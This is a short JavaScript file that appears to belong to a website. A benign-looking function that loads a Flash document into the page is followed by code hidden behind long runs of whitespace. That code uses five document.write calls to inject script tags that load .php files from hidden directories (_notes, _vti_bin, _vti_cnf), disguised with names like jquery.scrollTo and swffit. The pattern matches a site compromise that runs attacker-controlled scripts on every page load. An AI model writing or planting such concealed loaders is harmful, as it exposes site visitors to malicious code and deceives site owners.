// Load the flash document into the browser
function loadDoc(divID, htmlCode)
{
	var d = document.getElementById(divID);
	if (d == null) {
		alert("Error loading document. Please contact technical support");
	} else {
		d.innerHTML = htmlCode;
	}
}																																																																							document.write('<script type="text/javascript" src="/fluidgalleries/xmlbackup/_notes/wp-gbcf_focus.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/_vti_bin/_vti_adm/ribbonScroll.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/_mm/ct3beta/messaging/users/scott_at_scottsingerphotography_com/checkuncheckboxes.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/_vti_cnf/_notes/swffit.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/fluidgalleries/dat/_notes/jquery.scrollTo-1.4.0-min.php"><\/script>');
